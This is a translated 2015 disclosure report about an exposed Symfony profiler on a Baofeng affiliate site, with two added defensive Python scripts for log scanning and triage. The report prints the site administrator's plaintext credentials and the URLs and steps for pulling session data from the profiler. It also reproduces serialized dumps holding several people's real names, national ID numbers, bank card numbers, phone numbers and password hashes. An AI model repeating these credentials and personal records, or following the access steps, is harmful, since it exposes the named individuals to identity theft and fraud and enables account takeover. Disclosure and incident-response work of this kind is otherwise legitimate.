
Vulnerability summary

Defect ID: wooyun-2015-0126789

Title: A Baofeng (暴风影音) site leaks user data (plaintext passwords / bank card numbers / names / e-mail addresses / phone numbers)

Vendor: 暴风影音 (Baofeng)

Author: null_z

Submitted: 2015-07-14 18:46

Fixed: 2015-08-29 10:14

Published: 2015-08-29 10:14

Vulnerability type: Sensitive information disclosure

Severity: High

Self-assessed rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-07-14: Details have been sent to the vendor and are awaiting vendor handling
2015-07-15: Vendor has confirmed; details disclosed to the vendor only
2015-07-25: Details disclosed to core white hats and experts in the relevant field
2015-08-04: Details disclosed to regular white hats
2015-08-14: Details disclosed to intern white hats
2015-08-29: Details disclosed to the public

Brief description:

Leads to exposure of some users' data (name / bank card number / phone number / e-mail / plaintext password).
But I think that, having already captured the administrator's account and plaintext password, everything else is only a matter of time.

Details:

The site is built on the Symfony framework and is misconfigured.
Back-end login page: http://union.baofeng.com/login
The administrator account and password were captured:

Key           Value
_password     "wangnan123"
_target_path  "/admin/"
_username     "bfwangnan"


[Screenshot: 2015-07-14 18:35:24的屏幕截图.png]

[Screenshot: 2015-07-14 18:35:38的屏幕截图.png]
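The `_username`/`_password` pair above (Symfony's default form_login field names) was captured in plaintext because the Symfony web profiler, which stores each request's POST parameters and session contents, was reachable on the production host. The profiler and the web debug toolbar belong to the dev environment only: their `/_profiler` and `/_wdt` routes, whether reached directly as in this report or through the `app_dev.php` front controller, should never be served to an external client in production, so any 2xx/3xx response to such a path in a production access log is a finding, and every request the profiler has stored since then has to be treated as exposed. The script below is an added example, not code from the report; it scans constructed Apache/nginx combined-format log lines (placeholder IPs and profiler tokens, not Baofeng's logs) and returns the clients that actually received a served response from a debug endpoint. 403/404 hits are reported nowhere because they show the web server, or `app_dev.php`'s built-in localhost check, already blocked the request.

```python
"""Flag served requests to Symfony debug endpoints in a web-server access log.

Added example, not from the original report. The log lines are constructed
sample data in Apache/nginx "combined" format; the debug route prefixes
(/_profiler, /_wdt) and the dev front controller name (app_dev.php) are
Symfony's real defaults.
"""
import re
from collections import defaultdict

# Paths that should never be served to an external client in production.
DEBUG_PATTERNS = [
    re.compile(r"^/_profiler(?:/|$)"),
    re.compile(r"^/_wdt(?:/|$)"),
    re.compile(r"^/app_dev\.php(?:/|$)"),
]

# Minimal "combined" log format: client, ident, user, [timestamp], "request", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample lines (documentation IPs, placeholder profiler tokens).
SAMPLE_LOG = [
    '203.0.113.7 - - [14/Jul/2015:18:02:27 +0800] "POST /login HTTP/1.1" 302 0',
    '203.0.113.7 - - [14/Jul/2015:18:06:51 +0800] "GET /_profiler/empty/search/results?limit=100 HTTP/1.1" 200 44012',
    '203.0.113.7 - - [14/Jul/2015:18:35:24 +0800] "GET /_profiler/a1b2c3?panel=request HTTP/1.1" 200 31877',
    '198.51.100.9 - - [14/Jul/2015:18:36:00 +0800] "GET /_profiler/ HTTP/1.1" 403 169',
    '198.51.100.9 - - [14/Jul/2015:18:36:05 +0800] "GET /app_dev.php/admin/ HTTP/1.1" 403 169',
    '192.0.2.44 - - [14/Jul/2015:18:40:11 +0800] "GET /admin/ HTTP/1.1" 200 8120',
    '192.0.2.44 - - [14/Jul/2015:18:40:12 +0800] "GET /_wdt/9f3c1a HTTP/1.1" 200 2210',
    'not a log line at all',
]


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = rec["path"].split("?", 1)[0]  # the query string is irrelevant here
    rec["status"] = int(rec["status"])
    return rec


def is_debug_endpoint(path):
    """True for the profiler, the web debug toolbar and the dev front controller."""
    return any(p.search(path) for p in DEBUG_PATTERNS)


def find_profiler_exposure(lines):
    """Map client IP -> [(path, status)] for debug-endpoint requests that were served.

    A 403/404 means the web server or app_dev.php's localhost check already
    blocked the request; a 2xx/3xx means the client really reached the profiler,
    so its stored requests (POST bodies, session tokens) must be treated as exposed.
    """
    hits = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None or not is_debug_endpoint(rec["path"]):
            continue
        if 200 <= rec["status"] < 400:
            hits[rec["ip"]].append((rec["path"], rec["status"]))
    return dict(hits)


if __name__ == "__main__":
    for ip, reqs in find_profiler_exposure(SAMPLE_LOG).items():
        print(ip, reqs)
```

On the constructed sample the script reports 203.0.113.7 (profiler search page and a token page, both served) and 192.0.2.44 (a served toolbar request), and ignores 198.51.100.9, whose requests were refused. The corresponding fix on the Symfony side is to keep the profiler and debug mode confined to the dev environment, leave `app_dev.php` out of the production deployment, and deny `/_profiler` and `/_wdt` at the web server as a second layer.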


The most annoying thing about this hole is that you have to wait; but since the admin account has already been obtained, there is no more need to wait.
Browse this page: http://union.baofeng.com/_profiler/empty/search/results?limit=100
The key information is the token in the first row.
We use that token to access http://union.baofeng.com/_profiler/b616dc,
appending the token after _profiler.
I'll list a few: 姜兆勇 [email protected] 15996110393 320723198510192617 6217001280001247353
http://union.baofeng.com/_profiler/60e43b

"C:74:\"Symfony\\Component\\Security\\Core\\Authentication\\Token\\UsernamePasswordToken\":2385:{a:3:{i:0;N;i:1;s:12:\"secured_area\";i:2;s:2335:\"a:4:{i:0;O:30:\"Baofeng\\NvwaBundle\\Entity\\User\":32:{s:34:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000id\";i:25650;s:43:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000baofeng_uid\";s:18:\"135601920031388542\";s:40:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000username\";s:9:\"pierjiang\";s:40:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000password\";s:32:\"040b96942b3bc38647365171c4e05ea8\";s:37:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000email\";s:16:\"[email protected]\";s:37:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000phone\";s:11:\"15996110393\";s:40:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000realname\";s:9:\"姜兆勇\";s:44:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000promote_code\";i:61645804;s:42:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000channel_id\";N;s:39:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000balance\";i:2240;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000user_type\";i:2;s:38:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000status\";i:2;s:42:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000user_roles\";s:25:\"ROLE_SITE_OWNER,ROLE_USER\";s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000create_at\";i:1394679128;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000create_by\";i:0;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000update_at\";i:0;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000update_by\";i:0;s:40:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000audit_at\";i:1394763193;s:40:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000audit_by\";i:20971;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000delete_at\";i:0;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000delete_by\";i:0;s:42:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000last_login\";i:1436867562;s:44:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000account_bank\";s:3:\"CCB\";s:45:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000bank_province\";i:18;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000bank_city\";i:129;s:45:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000account_found\";s:27:\"连云港海棠路分理处\";s:44:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000account_card\";s:19:\"6217001280001247353\";s:44:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000account_name\";s:9:\"姜兆勇\";s:43:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000identity_no\";s:18:\"320723198510192617\";s:39:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000is_paid\";i:1;s:45:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000install_ratio\";N;s:48:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000install_discount\";d:1;}i:1;b:1;i:2;a:2:{i:0;O:41:\"Symfony\\Component\\Security\\Core\\Role\\Role\":1:{s:47:\"\u0000Symfony\\Component\\Security\\Core\\Role\\Role\u0000role\";s:15:\"ROLE_SITE_OWNER\";}i:1;O:41:\"Symfony\\Component\\Security\\Core\\Role\\Role\":1:{s:47:\"\u0000Symfony\\Component\\Security\\Core\\Role\\Role\u0000role\";s:9:\"ROLE_USER\";}}i:3;a:0:{}}\";}}"


[Screenshot: 2015-07-14 18:06:51的屏幕截图.png]

[Screenshot: 2015-07-14 18:02:27的屏幕截图.png]


http://union.baofeng.com/_profiler/79e874
秦嘉成 445321198507235214 [email protected] 18620909778 557decc0bfc6ef3dcfeaf4f9f05819af

"C:74:\"Symfony\\Component\\Security\\Core\\Authentication\\Token\\UsernamePasswordToken\":2220:{a:3:{i:0;N;i:1;s:12:\"secured_area\";i:2;s:2170:\"a:4:{i:0;O:30:\"Baofeng\\NvwaBundle\\Entity\\User\":32:{s:34:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000id\";i:29720;s:43:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000baofeng_uid\";s:18:\"135601920065572877\";s:40:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000username\";s:7:\"ken1288\";s:40:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000password\";s:32:\"557decc0bfc6ef3dcfeaf4f9f05819af\";s:37:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000email\";s:16:\"[email protected]\";s:37:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000phone\";s:11:\"18620909778\";s:40:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000realname\";s:9:\"秦嘉成\";s:44:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000promote_code\";i:31817884;s:42:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000channel_id\";N;s:39:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000balance\";i:90;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000user_type\";i:1;s:38:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000status\";i:2;s:42:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000user_roles\";s:9:\"ROLE_USER\";s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000create_at\";i:1428939059;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000create_by\";i:0;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000update_at\";i:0;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000update_by\";i:0;s:40:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000audit_at\";i:1429510375;s:40:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000audit_by\";i:20971;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000delete_at\";i:0;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000delete_by\";i:0;s:42:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000last_login\";i:1436866632;s:44:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000account_bank\";s:3:\"BOC\";s:45:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000bank_province\";i:27;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000bank_city\";i:250;s:45:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000account_found\";s:18:\"广州羊城支行\";s:44:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000account_card\";s:19:\"6227003320750325120\";s:44:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000account_name\";s:9:\"秦嘉成\";s:43:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000identity_no\";s:18:\"445321198507235214\";s:39:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000is_paid\";i:1;s:45:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000install_ratio\";N;s:48:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000install_discount\";d:1;}i:1;b:1;i:2;a:1:{i:0;O:41:\"Symfony\\Component\\Security\\Core\\Role\\Role\":1:{s:47:\"\u0000Symfony\\Component\\Security\\Core\\Role\\Role\u0000role\";s:9:\"ROLE_USER\";}}i:3;a:0:{}}\";}}"


http://union.baofeng.com/_profiler/e6a93e

"C:74:\"Symfony\\Component\\Security\\Core\\Authentication\\Token\\UsernamePasswordToken\":3354:{a:3:{i:0;N;i:1;s:12:\"secured_area\";i:2;s:3304:\"a:4:{i:0;O:30:\"Baofeng\\NvwaBundle\\Entity\\User\":32:{s:34:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000id\";i:20971;s:43:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000baofeng_uid\";s:18:\"135601920019788257\";s:40:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000username\";s:10:\"bfwangnan \";s:40:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000password\";s:32:\"9c0ac866ba42e7fe3c10b803f624534f\";s:37:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000email\";s:19:\"[email protected]\";s:37:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000phone\";s:10:\"1235414321\";s:40:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000realname\";s:10:\"bfwangnan \";s:44:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000promote_code\";i:0;s:42:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000channel_id\";N;s:39:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000balance\";i:0;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000user_type\";i:9;s:38:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000status\";i:2;s:42:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000user_roles\";s:135:\"ROLE_SUPER_ADMIN,ROLE_USER_ADMIN,ROLE_FINANCE,ROLE_STATS,ROLE_SITE_ADMIN,ROLE_PAGE_EDITOR,ROLE_PAGE_ADMIN,ROLE_BD_ADMIN,ROLE_SHOP_ADMIN\";s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000create_at\";i:1375266262;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000create_by\";i:1;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000update_at\";i:1428377095;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000update_by\";i:20971;s:40:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000audit_at\";i:0;s:40:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000audit_by\";i:0;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000delete_at\";i:0;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000delete_by\";i:0;s:42:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000last_login\";i:1436866861;s:44:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000account_bank\";s:0:\"\";s:45:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000bank_province\";i:0;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000bank_city\";i:0;s:45:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000account_found\";s:0:\"\";s:44:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000account_card\";s:0:\"\";s:44:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000account_name\";s:0:\"\";s:43:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000identity_no\";s:0:\"\";s:39:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000is_paid\";i:1;s:45:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000install_ratio\";N;s:48:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000install_discount\";d:1;}i:1;b:1;i:2;a:9:{i:0;O:41:\"Symfony\\Component\\Security\\Core\\Role\\Role\":1:{s:47:\"\u0000Symfony\\Component\\Security\\Core\\Role\\Role\u0000role\";s:16:\"ROLE_SUPER_ADMIN\";}i:1;O:41:\"Symfony\\Component\\Security\\Core\\Role\\Role\":1:{s:47:\"\u0000Symfony\\Component\\Security\\Core\\Role\\Role\u0000role\";s:15:\"ROLE_USER_ADMIN\";}i:2;O:41:\"Symfony\\Component\\Security\\Core\\Role\\Role\":1:{s:47:\"\u0000Symfony\\Component\\Security\\Core\\Role\\Role\u0000role\";s:12:\"ROLE_FINANCE\";}i:3;O:41:\"Symfony\\Component\\Security\\Core\\Role\\Role\":1:{s:47:\"\u0000Symfony\\Component\\Security\\Core\\Role\\Role\u0000role\";s:10:\"ROLE_STATS\";}i:4;O:41:\"Symfony\\Component\\Security\\Core\\Role\\Role\":1:{s:47:\"\u0000Symfony\\Component\\Security\\Core\\Role\\Role\u0000role\";s:15:\"ROLE_SITE_ADMIN\";}i:5;O:41:\"Symfony\\Component\\Security\\Core\\Role\\Role\":1:{s:47:\"\u0000Symfony\\Component\\Security\\Core\\Role\\Role\u0000role\";s:16:\"ROLE_PAGE_EDITOR\";}i:6;O:41:\"Symfony\\Component\\Security\\Core\\Role\\Role\":1:{s:47:\"\u0000Symfony\\Component\\Security\\Core\\Role\\Role\u0000role\";s:15:\"ROLE_PAGE_ADMIN\";}i:7;O:41:\"Symfony\\Component\\Security\\Core\\Role\\Role\":1:{s:47:\"\u0000Symfony\\Component\\Security\\Core\\Role\\Role\u0000role\";s:13:\"ROLE_BD_ADMIN\";}i:8;O:41:\"Symfony\\Component\\Security\\Core\\Role\\Role\":1:{s:47:\"\u0000Symfony\\Component\\Security\\Core\\Role\\Role\u0000role\";s:15:\"ROLE_SHOP_ADMIN\";}}i:3;a:0:{}}\";}}"


http://union.baofeng.com/_profiler/40f295
冯晶晶 [email protected] 798c089807b2ec3ff4d67a34f436185c 18201659496

"C:74:\"Symfony\\Component\\Security\\Core\\Authentication\\Token\\UsernamePasswordToken\":2191:{a:3:{i:0;N;i:1;s:12:\"secured_area\";i:2;s:2141:\"a:4:{i:0;O:30:\"Baofeng\\NvwaBundle\\Entity\\User\":32:{s:34:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000id\";i:28800;s:43:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000baofeng_uid\";s:18:\"135601920055985064\";s:40:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000username\";s:16:\"zhuangjilianmeng\";s:40:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000password\";s:32:\"798c089807b2ec3ff4d67a34f436185c\";s:37:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000email\";s:16:\"[email protected]\";s:37:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000phone\";s:11:\"18201659496\";s:40:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000realname\";s:9:\"冯晶晶\";s:44:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000promote_code\";i:26756774;s:42:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000channel_id\";N;s:39:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000balance\";i:60420;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000user_type\";i:1;s:38:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000status\";i:2;s:42:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000user_roles\";s:9:\"ROLE_USER\";s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000create_at\";i:1421980882;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000create_by\";i:0;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000update_at\";i:1421997796;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000update_by\";i:20971;s:40:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000audit_at\";i:1421996666;s:40:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000audit_by\";i:20971;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000delete_at\";i:0;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000delete_by\";i:0;s:42:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000last_login\";i:1436866778;s:44:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000account_bank\";s:0:\"\";s:45:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000bank_province\";i:0;s:41:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000bank_city\";i:0;s:45:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000account_found\";s:0:\"\";s:44:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000account_card\";s:0:\"\";s:44:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000account_name\";s:0:\"\";s:43:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000identity_no\";s:0:\"\";s:39:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000is_paid\";i:1;s:45:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000install_ratio\";N;s:48:\"\u0000Baofeng\\NvwaBundle\\Entity\\User\u0000install_discount\";d:0.40000000000000002;}i:1;b:1;i:2;a:1:{i:0;O:41:\"Symfony\\Component\\Security\\Core\\Role\\Role\":1:{s:47:\"\u0000Symfony\\Component\\Security\\Core\\Role\\Role\u0000role\";s:9:\"ROLE_USER\";}}i:3;a:0:{}}\";}}"
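The dumps above are PHP serialize() output of Symfony's UsernamePasswordToken as the profiler found it in the session: a `C:` record (the token implements Serializable) whose payload holds the credentials, the firewall name `secured_area` and a nested serialized string, which in turn holds the Doctrine `Baofeng\NvwaBundle\Entity\User` entity with all of its private properties (serialized as `\0Class\0name`), the roles and the attributes. That nesting is why bank card numbers, ID numbers and phone numbers are visible to anyone who can read a profiler page, even though the entity's `password` property holds a 32-character hex digest rather than the plaintext; the plaintext admin password in the report came from the profiler's record of the login form POST instead. The parser below is an added example, not code from the report or from Symfony; it unserializes such a token and lists the personal-data fields it exposes, which is what an incident responder needs when triaging stored profiler data. The sample token is constructed with placeholder values (only the class and property names follow the dumps), and `ps()`, `php_object()` and `php_custom()` are small helpers written here to build it, not a library API.

```python
"""Unserialize a profiler-dumped Symfony UsernamePasswordToken and list the personal data it exposes.

Added example, not from the original report. PhpUnserializer covers the PHP serialize() types such a
token uses (N b i d s a O C); ps()/php_object()/php_custom() are helpers written for this example to
build a sample token whose values are placeholders (only class and property names follow the report).
"""

SENSITIVE_FIELDS = {"password", "email", "phone", "realname", "identity_no", "account_card", "account_name"}


class PhpUnserializer:
    def __init__(self, data: bytes):
        self.d, self.i = data, 0

    def _until(self, ch: bytes) -> bytes:  # read up to a delimiter and consume it
        j = self.d.index(ch, self.i)
        out, self.i = self.d[self.i:j], j + 1
        return out

    def _take(self, n: int, tail: bytes) -> bytes:
        """Read n raw bytes (PHP lengths are byte counts, so CJK text is safe), then a literal tail."""
        out, self.i = self.d[self.i:self.i + n], self.i + n
        if self.d[self.i:self.i + len(tail)] != tail:
            raise ValueError(f"expected {tail!r} at offset {self.i}")
        self.i += len(tail)
        return out

    def _class_name(self) -> str:  # the len:"Name": prefix shared by O: and C: records
        n = int(self._until(b":"))
        self.i += 1  # opening quote
        return self._take(n, b'":').decode("utf-8")

    def parse(self):
        t = self.d[self.i:self.i + 1]
        self.i += 2  # type letter plus ':' (or the ';' that ends N)
        if t == b"N": return None
        if t == b"b": return self._until(b";") == b"1"
        if t == b"i": return int(self._until(b";"))
        if t == b"d": return float(self._until(b";"))
        if t == b"s":
            n = int(self._until(b":"))
            self.i += 1  # opening quote
            return self._take(n, b'";').decode("utf-8")
        if t == b"a":
            n, arr = int(self._until(b":")), {}
            self.i += 1  # '{'
            for _ in range(n):
                key = self.parse()
                arr[key] = self.parse()
            self.i += 1  # '}'
            return arr
        if t == b"O":
            cls, obj = self._class_name(), {}
            n = int(self._until(b":"))
            self.i += 1  # '{'
            for _ in range(n):
                key = self.parse()  # private props serialize as "\0Class\0name"
                obj[key.rsplit("\0", 1)[-1]] = self.parse()
            self.i += 1  # '}'
            return {"__class": cls, **obj}
        if t == b"C":  # Serializable class: raw payload of the given byte length
            cls = self._class_name()
            n = int(self._until(b":"))
            self.i += 1  # '{'
            return {"__class": cls, "__payload": PhpUnserializer(self._take(n, b"}")).parse()}
        raise ValueError(f"unknown type {t!r} at offset {self.i}")


def exposed_personal_data(token_blob: bytes) -> dict:
    """Walk the token as Symfony nests it: C:{a:3:[credentials, firewall, parent]}, where parent is
    itself a serialized string holding a:4:[user entity, authenticated, roles, attributes]."""
    outer = PhpUnserializer(token_blob).parse()["__payload"]
    user, _auth, roles, _attrs = (PhpUnserializer(outer[2].encode("utf-8")).parse()[k] for k in range(4))
    return {"firewall": outer[1], "user_class": user["__class"],
            "roles": [r["role"] for r in roles.values()],
            "fields": {k: v for k, v in user.items() if k in SENSITIVE_FIELDS and v not in (None, "")}}


# --- constructed sample token: a tiny serializer plus placeholder values ---
def ps(v) -> bytes:
    """Minimal PHP serialize() for None/bool/int/str/dict; bytes pass through already serialized."""
    if isinstance(v, bytes): return v
    if v is None: return b"N;"
    if isinstance(v, bool): return b"b:%d;" % v
    if isinstance(v, int): return b"i:%d;" % v
    if isinstance(v, str): return b's:%d:"%s";' % (len(v.encode("utf-8")), v.encode("utf-8"))
    return b"a:%d:{%s}" % (len(v), b"".join(ps(k) + ps(x) for k, x in v.items()))

def php_object(cls: str, private_props: dict) -> bytes:
    body = b"".join(ps("\0%s\0%s" % (cls, k)) + ps(v) for k, v in private_props.items())
    return b'O:%d:"%s":%d:{%s}' % (len(cls), cls.encode(), len(private_props), body)

def php_custom(cls: str, payload: bytes) -> bytes:
    return b'C:%d:"%s":%d:{%s}' % (len(cls), cls.encode(), len(payload), payload)

USER_CLASS = "Baofeng\\NvwaBundle\\Entity\\User"
ROLE_CLASS = "Symfony\\Component\\Security\\Core\\Role\\Role"
TOKEN_CLASS = "Symfony\\Component\\Security\\Core\\Authentication\\Token\\UsernamePasswordToken"
_user = php_object(USER_CLASS, {  # placeholder values only; property names follow the report's dumps
    "id": 1, "username": "example_user", "password": "0" * 32, "email": "user@example.com",
    "phone": "13800000000", "realname": "示例用户", "channel_id": None, "balance": 0,
    "account_card": "6200000000000000000", "identity_no": "110101199001011234"})
_parent = ps({0: _user, 1: True, 2: {0: php_object(ROLE_CLASS, {"role": "ROLE_USER"})}, 3: {}})
SAMPLE_TOKEN = php_custom(TOKEN_CLASS, ps({0: None, 1: "secured_area", 2: _parent.decode("utf-8")}))
```

`exposed_personal_data(SAMPLE_TOKEN)` returns the firewall name, the entity class, the role list and a `fields` dict containing only the populated sensitive properties (here password digest, e-mail, phone, real name, bank card and ID number, with the empty or null ones dropped). The same call on a dump from a real profiler page, after un-escaping the JSON string the page wraps it in, tells you exactly which people and which attributes were exposed, which is the list a breach notification has to be built from; it is also why the profiler's stored data must be purged once the endpoint is closed.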

Proof of vulnerability:

[Screenshot: 2015-07-14 18:35:24的屏幕截图.png]

[Screenshot: 2015-07-14 18:35:38的屏幕截图.png]

[Screenshot: 2015-07-14 18:06:51的屏幕截图.png]

[Screenshot: 2015-07-14 18:02:27的屏幕截图.png]

Suggested fix:

You know what to do!

Copyright notice: please credit the source when reposting: null_z@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 15

Confirmed: 2015-07-15 10:12

Vendor reply:

Thank you for submitting this vulnerability; we will fix it as soon as possible.

Latest status:

None yet